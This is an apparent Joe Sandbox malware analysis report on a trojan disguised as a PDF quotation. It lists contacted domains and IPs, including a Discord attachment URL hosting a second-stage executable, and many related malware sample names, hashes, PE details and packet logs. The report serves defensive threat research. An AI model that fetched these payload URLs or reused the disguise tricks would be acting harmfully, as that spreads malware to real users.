https://stackoverflow.com/q/11564914/23354;	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cdn.discordapp.com	AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006A66000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006971000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.discordappD	AppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com	AppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.00000000069A5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://di.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe	AppLaunch.exe, 0000000B.00000002.572215304.0000000000C31000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006971000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cdn.discordap	AppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.129.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false
162.159.134.233	unknown	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1310965
Start date and time:	2023-09-19 18:54:46 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Original Sample Name:	QUOTATION_SEPT9FIBA00541PDF.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@13/1@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 97% Number of executed functions: 117 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200
Excluded domains from analysis (whitelisted): www.bing.com, dual-a-0001.dc-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, tse1.mm.bing.net, displaycatalog.mp.microsoft.com, arc.msn.com, www-www.bing.com.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
18:56:17	API Interceptor	203015x Sleep call for process: AppLaunch.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.129.233	SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
	64AE5410F978DF0F48DCC67508820EA230C566967E002.exe	Get hash	malicious	DCRat	Browse	cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
	http://162.159.129.233	Get hash	malicious	Unknown	Browse	162.159.129.233/favicon.ico
	2lfV6QiE6j.exe	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
	SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
	1PhgF7ujwW.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
	vhNyVU8USk.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
	Order 4503860408.exe	Get hash	malicious	AgentTesla	Browse	cdn.discordapp.com/attachments/809311531652087809/839376179840286770/originbot4.0.exe
	cotizacin.doc	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/812102734177763331/819187064415191071/bextrit.exe
	SecuriteInfo.com.PWS-FCXDF96A01717A58.15363.exe	Get hash	malicious	Remcos	Browse	cdn.discordapp.com/attachments/819169403979038784/819184830453514270/fraem.exe
	7G5RoevPnu.exe	Get hash	malicious	Amadey Ficker Stealer	Browse	cdn.discordapp.com/attachments/807746340997431316/809208342068199434/118fir2crtg.exe
	70% Balance Payment.doc	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/785631384156110868/785631871395561492/italianmassloga.exe
	TT20201712.doc	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
	ENQ-015August 2020 R1 Proj LOT.doc	Get hash	malicious	FormBook	Browse	cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg
162.159.134.233	PO - Drawings And Specifications Sheet_pdf.scr.exe	Get hash	malicious	AveMaria	Browse	cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
	mvoElayshk.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
	xuTyOmef1g.exe	Get hash	malicious	Amadey RedLine SmokeLoader	Browse	cdn.discordapp.com/attachments/878382243242983437/879113244856430592/Microsoft.exe
	VMKwliCGEP.rtf	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/785611664095313920/785649743954706472/bin.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cdn.discordapp.com	Tzhwq.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.130.233
	file.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader, Vidar	Browse	162.159.133.233
	VOXP5aviBQ.exe	Get hash	malicious	RedLine	Browse	162.159.135.233
	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, AveMaria	Browse	162.159.135.233
	file.exe	Get hash	malicious	Amadey, Fabookie, Mystic Stealer, RedLine, SmokeLoader	Browse	162.159.135.233
	TR23-USD-33_Incoice_of_MV_ADAMOON.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.130.233
	sd3nCNrXhl.exe	Get hash	malicious	Fabookie, Glupteba, SmokeLoader	Browse	162.159.135.233
	Eozcmq.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.135.233
	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, AveMaria	Browse	162.159.130.233
	Ldswaby.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.134.233
	LrOq2OzIbC.exe	Get hash	malicious	Fabookie, Glupteba, SmokeLoader	Browse	162.159.130.233
	9hzxje3AvY.exe	Get hash	malicious	Fabookie, Glupteba, SmokeLoader	Browse	162.159.134.233
	file.exe	Get hash	malicious	Clipboard Hijacker, RedLine	Browse	162.159.130.233
	854F1E97-5DBB-4AA87-A566-33D9012B095E2pdf.exe	Get hash	malicious	Unknown	Browse	162.159.129.233
	854F1E97-5DBB-4AA87-A566-33D9012B095E2pdf.exe	Get hash	malicious	Unknown	Browse	162.159.130.233
	Chemco_PO_2056598.doc	Get hash	malicious	Unknown	Browse	162.159.135.233
	Rzkomf.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.135.233
	https://cdn.discordapp.com/attachments/1149416411790327819/1149416836249690214/Hotel_Extra_Information.zip	Get hash	malicious	Unknown	Browse	162.159.134.233
	Vgtrnwhgbt.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.130.233
	854F1E97-5DBB-4AD7-A566-43D9012B05E23_pdf.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.130.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PO184383.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	Halkbank_Ekstre_20230918_44390_097542.exe	Get hash	malicious	Azorult, GuLoader	Browse	104.21.47.12
	TOIXYXBFXF.png	Get hash	malicious	Unknown	Browse	172.64.154.107
	Bank_Statement.exe	Get hash	malicious	AgentTesla	Browse	162.159.135.233
	thong_bao_hang_den_20233_2414458944.exe	Get hash	malicious	AgentTesla	Browse	162.159.136.232
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	Azorult, GuLoader	Browse	172.67.131.40
	Ziraat_Bankasi_Swift_Mesaji.pdf.exe	Get hash	malicious	GuLoader	Browse	172.67.131.40
	https://xxui87wghqwyyuw8jh00989wjwqgu.trazosconstruccion.cl/jtruckenbrod@lockton.com	Get hash	malicious	Unknown	Browse	104.21.2.50
	http://57thandnormal.com	Get hash	malicious	Unknown	Browse	104.21.82.223
	#U00d6DEME_KOPYASI.exe	Get hash	malicious	AgentTesla	Browse	162.159.129.233
	#U00d6DEME_KOPYASI.exe	Get hash	malicious	AgentTesla	Browse	162.159.135.233
	BL_DRAFT_AND_PACKING_LIST.xls	Get hash	malicious	FormBook, NSISDropper	Browse	172.67.146.208
	#U00d6DEME_DETAYLARI.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	https://fpq68.app.link/vl1f9jtoaDb	Get hash	malicious	Unknown	Browse	104.18.26.193
	Tzhwq.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.133.233
	file.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader, Vidar	Browse	172.67.181.144
	VJF4HONFgR.exe	Get hash	malicious	CobaltStrike	Browse	172.67.208.220
	https://o7jq6.app.link/RdqZsE2bcDb	Get hash	malicious	Unknown	Browse	104.18.26.193
	ber 2023.msg	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	SecuriteInfo.com.Win32.TrojanX-gen.19321.7615.exe	Get hash	malicious	SmokeLoader	Browse	172.67.171.76
CLOUDFLARENETUS	PO184383.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	Halkbank_Ekstre_20230918_44390_097542.exe	Get hash	malicious	Azorult, GuLoader	Browse	104.21.47.12
	TOIXYXBFXF.png	Get hash	malicious	Unknown	Browse	172.64.154.107
	Bank_Statement.exe	Get hash	malicious	AgentTesla	Browse	162.159.135.233
	thong_bao_hang_den_20233_2414458944.exe	Get hash	malicious	AgentTesla	Browse	162.159.136.232
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	Azorult, GuLoader	Browse	172.67.131.40
	Ziraat_Bankasi_Swift_Mesaji.pdf.exe	Get hash	malicious	GuLoader	Browse	172.67.131.40
	https://xxui87wghqwyyuw8jh00989wjwqgu.trazosconstruccion.cl/jtruckenbrod@lockton.com	Get hash	malicious	Unknown	Browse	104.21.2.50
	http://57thandnormal.com	Get hash	malicious	Unknown	Browse	104.21.82.223
	#U00d6DEME_KOPYASI.exe	Get hash	malicious	AgentTesla	Browse	162.159.129.233
	#U00d6DEME_KOPYASI.exe	Get hash	malicious	AgentTesla	Browse	162.159.135.233
	BL_DRAFT_AND_PACKING_LIST.xls	Get hash	malicious	FormBook, NSISDropper	Browse	172.67.146.208
	#U00d6DEME_DETAYLARI.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	https://fpq68.app.link/vl1f9jtoaDb	Get hash	malicious	Unknown	Browse	104.18.26.193
	Tzhwq.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.133.233
	file.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader, Vidar	Browse	172.67.181.144
	VJF4HONFgR.exe	Get hash	malicious	CobaltStrike	Browse	172.67.208.220
	https://o7jq6.app.link/RdqZsE2bcDb	Get hash	malicious	Unknown	Browse	104.18.26.193
	ber 2023.msg	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	SecuriteInfo.com.Win32.TrojanX-gen.19321.7615.exe	Get hash	malicious	SmokeLoader	Browse	172.67.171.76

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Bank_Statement.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	thong_bao_hang_den_20233_2414458944.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	SOA.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	obizx.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	#U00d6DEME_KOPYASI.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	T#U00fcrkiye_#U0130#U015f_Bankas#U0131_#U00d6deme.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	#U00d6DEME_KOPYASI.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	MR#72-1315.vbs	Get hash	malicious	GuLoader	Browse	162.159.134.233
	1161051-Rev0.vbs	Get hash	malicious	GuLoader	Browse	162.159.134.233
	#U00d6DEME_DETAYLARI.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	bPTV.exe	Get hash	malicious	Njrat	Browse	162.159.134.233
	Tzhwq.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.134.233
	updated_soa.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	Grain_push_barges_Specification.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	solicitare_oferta_de_pret_Abzac_Romania.vbs	Get hash	malicious	Unknown	Browse	162.159.134.233
	PO-7100062_xlsx.vbs	Get hash	malicious	GuLoader	Browse	162.159.134.233
	SHIPPING_DOCUMENT.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	Revised_Inv_with_new_bank_details.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	blTlJaVqEA.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	file.exe	Get hash	malicious	RisePro Stealer, Vidar	Browse	162.159.134.233

Process:	C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	927
Entropy (8bit):	5.364918554738821
Encrypted:	false
SSDEEP:	24:ML9E4KI2KDE4KhKYIqDcfJKhRAE4KzQK3E4KoE4Ad:MxHKI2YHKhBUoRAHKz93HKoH0
MD5:	FAA42D383F086EB1E2A7CCC1EA3FCA12
SHA1:	D3A9A12B6EF0C98407FDC88931780C91470453FA
SHA-256:	B46A1C014FD7E8A54AD77CCE53420886AD3CCC49BA882AE338E5B28F235B2331
SHA-512:	42353BD8E16FF4DB0724195DC116B15BA3F2EA3F50EAD603AE628DF29107F273C49C1985DEE236EF87AF290D71BA5613CFCCC83C37BE98A646195066B13B21EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\1aff708a68d7a055e25b20efa5a36148\System.Net.Http.ni.dll",0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.85886357508921
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
File size:	672'768 bytes
MD5:	a4be5e5c00ec493498b67ae5c2fd2d04
SHA1:	1c197e31fb8fde59cdd69d2f69e13dde8db55413
SHA256:	1b1c9bbe9504df699338d7e0f95579db33ae5aa611eb55559d05b116b8c80a84
SHA512:	6d2b078de5fb3e4b626f26bb72a974507a94d9cbfebc902218ae09495a9b91c58554a645cd0d8a24aedbe0e058073d57fbc17bd48e3afcfe68fc3f309ff73cee
SSDEEP:	12288:WRaIT2OpU4kW24+HJk2b3Q26L0irp+qQcDzX:Wjxp7n+pkc30L0zc/
TLSH:	5EE4BE5676749132EC04CA3424F2EE14D2DBEE6C6BF1950924D8B6AD1B322FE8F079C5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4.e.................$...........B... ...`....@.. ....................................`................................

File Icon


Icon Hash:	0e3333b0bbb3b035

Static PE Info

General

Entrypoint:	0x4542fe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x650934F7 [Tue Sep 19 05:43:19 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x542b0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x56000	0x51aa4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x52304	0x52400	False	0.9773609659954408	data	7.979516114599912	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x56000	0x51aa4	0x51c00	False	0.071357750382263	data	2.351708526517888	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa8000	0xc	0x200	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x56370	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	0.7601351351351351
RT_ICON	0x56498	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 832	0.7155963302752294
RT_ICON	0x56800	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.6826241134751773
RT_ICON	0x56c68	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	0.5389784946236559
RT_ICON	0x56f50	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3200	0.470679012345679
RT_ICON	0x57bf8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4378517823639775
RT_ICON	0x58ca0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	0.36402439024390243
RT_ICON	0x59308	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 7296	0.33110687022900764
RT_ICON	0x5afb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.30881742738589213
RT_ICON	0x5d558	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2560	0.2924174174174174
RT_ICON	0x5dfc0	0x3228	Device independent bitmap graphic, 64 x 128 x 24, image size 12800	0.26580996884735203
RT_ICON	0x611e8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0	0.24244213509683515
RT_ICON	0x65410	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	0.014139568600763382
RT_GROUP_ICON	0xa7438	0xbc	data	0.5797872340425532
RT_VERSION	0xa74f4	0x3c4	data	0.4149377593360996
RT_MANIFEST	0xa78b8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2023 18:56:18.515609026 CEST	49738	80	192.168.2.5	162.159.129.233
Sep 19, 2023 18:56:18.606514931 CEST	80	49738	162.159.129.233	192.168.2.5
Sep 19, 2023 18:56:18.606640100 CEST	49738	80	192.168.2.5	162.159.129.233
Sep 19, 2023 18:56:18.607820988 CEST	49738	80	192.168.2.5	162.159.129.233
Sep 19, 2023 18:56:18.699311972 CEST	80	49738	162.159.129.233	192.168.2.5
Sep 19, 2023 18:56:18.727654934 CEST	80	49738	162.159.129.233	192.168.2.5
Sep 19, 2023 18:56:18.769634008 CEST	49738	80	192.168.2.5	162.159.129.233
Sep 19, 2023 18:56:18.845865011 CEST	49739	443	192.168.2.5	162.159.134.233
Sep 19, 2023 18:56:18.845916033 CEST	443	49739	162.159.134.233	192.168.2.5
Sep 19, 2023 18:56:18.846009970 CEST	49739	443	192.168.2.5	162.159.134.233
Sep 19, 2023 18:56:18.858933926 CEST	49739	443	192.168.2.5	162.159.134.233
Sep 19, 2023 18:56:18.858967066 CEST	443	49739	162.159.134.233	192.168.2.5
Sep 19, 2023 18:56:19.054492950 CEST	443	49739	162.159.134.233	192.168.2.5
Sep 19, 2023 18:56:19.054620028 CEST	49739	443	192.168.2.5	162.159.134.233
Sep 19, 2023 18:56:19.056859970 CEST	49739	443	192.168.2.5	162.159.134.233
Sep 19, 2023 18:56:19.056864977 CEST	443	49739	162.159.134.233	192.168.2.5
Sep 19, 2023 18:56:19.057090998 CEST	443	49739	162.159.134.233	192.168.2.5
Sep 19, 2023 18:56:19.097670078 CEST	49739	443	192.168.2.5	162.159.134.233
Sep 19, 2023 18:56:19.168509960 CEST	49739	443	192.168.2.5	162.159.134.233
Sep 19, 2023 18:56:19.212641954 CEST	443	49739	162.159.134.233	192.168.2.5
Sep 19, 2023 18:56:19.370402098 CEST	443	49739	162.159.134.233	192.168.2.5
Sep 19, 2023 18:56:19.370491028 CEST	443	49739	162.159.134.233	192.168.2.5
Sep 19, 2023 18:56:19.370593071 CEST	49739	443	192.168.2.5	162.159.134.233
Sep 19, 2023 18:56:19.377451897 CEST	49739	443	192.168.2.5	162.159.134.233
Sep 19, 2023 18:56:38.364000082 CEST	49738	80	192.168.2.5	162.159.129.233
Sep 19, 2023 18:56:38.675901890 CEST	49738	80	192.168.2.5	162.159.129.233
Sep 19, 2023 18:56:38.768053055 CEST	80	49738	162.159.129.233	192.168.2.5
Sep 19, 2023 18:56:38.768197060 CEST	49738	80	192.168.2.5	162.159.129.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2023 18:56:18.406034946 CEST	64997	53	192.168.2.5	8.8.8.8
